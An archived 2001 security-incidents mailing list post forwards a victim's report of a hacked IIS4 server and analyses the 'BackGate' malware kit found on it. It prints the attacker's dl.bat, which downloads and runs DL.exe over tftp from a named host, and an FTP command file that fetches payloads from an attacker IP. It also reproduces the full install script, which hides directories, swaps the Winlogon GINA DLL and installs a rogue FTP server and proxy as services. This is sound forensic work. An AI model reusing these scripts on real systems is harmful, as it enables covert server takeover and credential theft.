Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

FW: I've been hacked! [BackGate Kit]

From: Matt Scarborough <vexversa () USA NET>
Date: Tue, 20 Feb 2001 18:14:51 EST
Moderator: Incidents, Forensics, or the bit bucket, whatever you like.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                       FW: I've been hacked!!                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote

I am fairly new to security issues, but I am very experienced with Windows.
Today I found that somone broke into my NT 4.0 server. It is running IIS 4
for an internal web page and someone copied some files to my scripts
directory. They were able to execute a file called dl.exe that was hogging
all of my CPU cycles. I found that I had not removed anonymous access and
access from the outside. Can anyone help me find out how they got in and
make sure that they can't get back in? Any help would be appreciated.

Here is a list of the file names:

00.d
dl.bat
dl.exe
ftpcmds.txt

dl.bat contains the following:

@echo off
cd \Inetpub\scripts
startDL:
tftp.exe -i web004.2coolweb.com get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit

ftpcmds.txt contains the following:

open 216.205.125.115 29292
user DL
DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                     END FW: I've been hacked!!                     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

While this doesn't shed much light on how Larry K, was hacked, it illustrates
the results of leaving IIS un-hardened.

I ambled over to
tftp://63.84.169.1:69 (web004.2coolweb.com)
for DL.EXE, and then to
ftp://DL@216.205.125.115:29292 (115-216.205.125.dellhost.com)
for the BackGate kit that was downloaded to Larry's IIS4 box.

Below is what I found. Creates a Warez repository and FTP Proxy.
No response to attempts at contacting host owners or upstream of the (T)FTP
site(s) distributing malware.

Matt 2001-02-20

Text strings courtesy of BinText by Robin Keir
http://www.foundstone.com
UPX is The Ultimate Packer for eXecutables
http://upx.tsx.org

=====================
  Contents of DL.EXE
tftp from 63.84.169.1
=====================
UPX 1.02 contents Un-packed

00001C10   00401C10      0   wininet.dll
00001C20   00401C20      0   FtpGetFileA
00001C64   00401C64      0   FtpPutFileA
00001CA8   00401CA8      0   FtpSetCurrentDirectoryA
00001D08   00401D08      0   InternetOpenA
00001D50   00401D50      0   InternetConnectA
00001F70   00401F70      0   FtpOpenFileA
00001FB8   00401FB8      0   FtpDeleteFileA
000016DF   004016DF      0   @*\AZ:\FTPInstFileDL\Project1.vbp
000019D4   004019D4      0   vb wininet
00001CC4   00401CC4      0   /05.D
00002144   00402144      0   216.205.125.115
00002174   00402174      0   /00.D
00002194   00402194      0   /01.D
000021B4   004021B4      0   /02.D
000021D4   004021D4      0   /03.D
000021F4   004021F4      0   /04.D
00002224   00402224      0   /06.D
00002244   00402244      0   /07.D
00002264   00402264      0   /08.D
00002284   00402284      0   /09.D
000022A4   004022A4      0   /10.D
000022C4   004022C4      0   /11.D
000022E4   004022E4      0   /12.D
00002304   00402304      0   /13.D
=====EoF=====

================
Contents of 00.D
================
@echo off
echo Renaming Files
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
echo Making ini
.\makeini.exe %1
echo Making Dirs
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
.\restrict.exe %windir%\system32\os2\dll\new
md %1:\adminback0810\root
attrib %1:\adminback0810\root +s +h
.\restrict.exe %1:\adminback0810\root
md %1:\adminback0810\root\system
attrib %1:\adminback0810\root\system +s +h
.\restrict.exe %1:\adminback0810\root\system
md %1:\adminback0810\root\system\dll
attrib %1:\adminback0810\root\system\dll +s +h
.\restrict.exe %1:\adminback0810\root\system\dll
echo Copying Files
copy .\FireDaemon.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.bak %windir%\system32\os2\dll\new\ > nul:
copy .\login.txt %windir%\system32\os2\dll\new\ > nul:
copy .\dir.txt %windir%\system32\os2\dll\new\ > nul:
copy .\MMtask.exe %windir%\system32\os2\dll\new\ > nul:
copy .\newgina.dll %windir%\system32\ > nul:
attrib %windir%\system32\newgina.dll +s +h
echo Setting up Registry
.\regit.exe .\settings.reg
echo Installing Services
set MXBIN=%windir%\system32\os2\dll\new
set MXHOME=%windir%\system32\os2\dll\new
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV
"%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0
0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK
"%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" ""
Y 0 0 N Y
.\reggina.exe
echo Waiting 5 sec.
.\restsec.exe 5
echo Starting Services
net start os2srv
net start mmtask
echo Services Installed and Started
echo Deleting Install-Files
del FireDaemon.exe 
del makeini.exe
del SUD.exe
del SUD.ini
del SUD.bak
del login.txt
del dir.txt
del MMtask.exe
del newgina.dll
del restrict.exe
del regit.exe
del settings.reg
del reggina.exe
del restsec.exe
attrib E.asp -r
del E.asp
del dl.bat
del install.bat
=====EOF=====

================
Contents of 01.D
    DIR.TXT
================
---
%ServerKBps KBps Current bandwith used
%Dfree MB free
---
=====EoF=====

================
Contents of 02.D
 FIREDAEMON.EXE
================
UPX 1.02 contents Un-packed


File pos   Mem pos      ID   Text
========   =======      ==   ====
0000E2AC   0040E2AC      0   v0.09c
0000E2B4   0040E2B4      0    (c) 1999-2000 Sublime Solutions
0000E2D5   0040E2D5      0   Usage:   
0000E2E0   0040E2E0      0    [-i <ServiceName> <AppDir>
0000E2FC   0040E2FC      0            [[AppName] [AppOpts] [Restart] [Mask]
[Priority] [Interact] [Autostart]]
0000E51E   0040E51E      0   Purpose: 
0000E528   0040E528      0    allows Win32 applications to be installed as
0000E556   0040E556      0            a Windows NT/2K service. The service can
be run as the System Account
0000E5A5   0040E5A5      0            or as an NT/2K domain account.
0000F05C   0040F05C      0   URL:        http://www.firedaemon.com/
0000F083   0040F083      0   Bugs:       Please report bugs to
support () firedaemon com
=====EoF=====

================
Contents of 03.D
  LOGIN.TXT
================
---
Running for:
%ServerDays Days, %ServerHours Hours, %ServerMins Minutes and %ServerSecs
Seconds
---
%ServerKbUp Kilobytes uploaded in %ServerFilesUp Files
%ServerKbDown Kilobytes downloaded in %ServerFilesDown Files
%ServerAvg KBps Average bandwith used
%Uall User(s) connected since server start 
%UNow User(s) currently connected
=====EoF=====

================
Contents of 04.D
  WG3ENG9X.EXE
================
UPX 1.02 contents Un-packed

000DC38A   004E398A      0   VS_VERSION_INFO
000DC434   004E3A34      0   WinGate 3.0 Engine for Windows 9X
000DC4F4   004E3AF4      0   WinGate Engine
000DC51A   004E3B1A      0   FileVersion
000DC534   004E3B34      0   1, 0, 1, 4
000DC582   004E3B82      0   LegalCopyright
000DC5B6   004E3BB6      0    1998 Qbik New Zealand Limited
000DC61C   004E3C1C      0   WinGate (TM)
000DC63E   004E3C3E      0   OriginalFilename
000DC660   004E3C60      0   WG3ENG9X.EXE
=====EoF=====

================
Contents of 05.D
  NEWGINA.DLL
================
Export Table
Name:   NEWGINA.dll
Characteristics:        00000000
Time Date Stamp:        38642141
Version:        0.00
=====EoF=====

================
Contents of 06.D
  REGGINA.EXE
================
File pos   Mem pos      ID   Text
========   =======      ==   ====
00004348   00404348      0   Microsoft Visual C++ Runtime Library

000050B4   004050B4      0   System\CurrentControlSet\Services\OS2srv
000050E0   004050E0      0   DisplayName
000050EC   004050EC      0   MMtask

000050F4   004050F4      0   System\CurrentControlSet\Services\MMtask
00005120   00405120      0   MSgina.dll
0000512C   0040512C      0   newgina.dll
00005138   00405138      0   OriginalGinaDLL
00005148   00405148      0   GinaDLL
00005150   00405150      0   Software\Microsoft\Windows
NT\CurrentVersion\Winlogon
=====EoF=====

================
Contents of 07.D
  REGEDIT.EXE
================

00009548   00409548      0   Compressed by Petite (c)1999 Ian Luck.
0000F7A6   0041ABA6      0   VS_VERSION_INFO
0000F96A   0041AD6A      0   Microsoft Corp. 1993-1995
0000F8EC   0041ACEC      0   4.00.1111 REGEDIT.EXE
=====EoF=====

================
Contents of 08.D
   REGIT.EXE
================

000000C8   004000C8      0   Compressed by Petite (c)1999 Ian Luck.

Import Table
ADVAPI32.dll
Ordinal Function Name   
0000    AddAce
=====EoF=====

================
Contents of 09.D
 RESTSEC.EXE
================
IDW tools

File pos   Mem pos      ID   Text
========   =======      ==   ====
00006620   06069220      0   Copyright (C) Microsoft Corp. 1981-1996
00006676   06069276      0   OriginalFilename
00006698   06069298      0   Sleep.Exe and Beep.Exe
000066CE   060692CE      0   ProductName
000066E8   060692E8      0   Microsoft(R) Windows NT(TM) Operating System
=====EoF=====

================
Contents of 10.D
REGEDIT 4 format
 SETTINGS.REG
================
<lots snipped>

[HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server]
"ServiceType"="CFTPService"
"Name"="FTP Proxy server"
"Description"="FTP Proxy server"
"PortNumber"=dword:0000243b
"Enabled"=dword:00000001
"TimeOutSessions"=dword:00000001
"SessionTimeout"=dword:00000258
"SpecificBinding"="127.0.0.1"
"SOCKS4Password"=""
"BypassProxyOnLocal"=dword:00000000

=====EoF=====

================
Contents of 11.D
    SUD.EXE
================
UPX 1.02 contents Un-packed

File pos   Mem pos      ID   Text
========   =======      ==   ====
0014DFE0   0054F5E0      0   Serv-U FTP Server v3.0 build 9 - Copyright (c)
1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
00178954   00582754   2075   This trial version of Serv-U is out-of-date! All
domains are offline
=====EoF=====

================
Contents of 12.D
  MAKEINI.EXE
================
Project1.exe
Import Table

MSVBVM60.DLL
Ordinal Function Name   
0000    MethCallEngine
0000    EVENT_SINK_AddRef

================
Contents of 13.D
    SUD.INI
================
[GLOBAL]
TryOut=Full
Version=3.0.0.7
LocalSetupPassword=<snipped>
LocalSetupPortNo=45092
DirCacheSize=60
PacketTimeOut=120
[DOMAINS]
Domain1=0.0.0.0||19216|Psychotic|1
[Domain1]
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
ReplyHello=PsychoticDreams
ReplyHelp=Help yourself.
ReplyNoAnon=no ANONYMOUS.
ReplyNoCredit=Upload some more.
ReplySYST=guess
ReplyTooMany=User limit reached.
ReplyDown=Server going offline.
ReplyOffline=Server offline.
DirChangeMesFile=C:\winnt\system32\os2\dll\new\dir.txt
User1=AdminIt|1
User2=MistarZet|1
User3=Tectonic|1
User4=nevermind|1
User5=Unibomber|1
User6=Nicodeimous|1
User7=Catie|1
User8=Mantis|1
User9=Pr0vit0|1
User10=X-Man|1
User11=FXskater|1
User12=delon15|1
User13=BigPun|1
User14=tafkamk|0
User15=Vegeetz|0
User16=Corsair|0
User17=palmleaf|0
User18=polux|0
User19=Termin-X|0
User20=NextLev|0
User21=X-byte|0
User22=XTracer|0
User23=Hooterman|0
User24=Section|0
User25=nightreg|0
User26=AssOnFire|0
User27=ZeroCode|0
User28=thunderbolt|0
<snipped>
=====EoF=====

____________________________________________________________________
Get free email and a permanent address at http://www.amexmail.com/?A=1
Previous By Date Next
Previous By Thread Next

Current thread: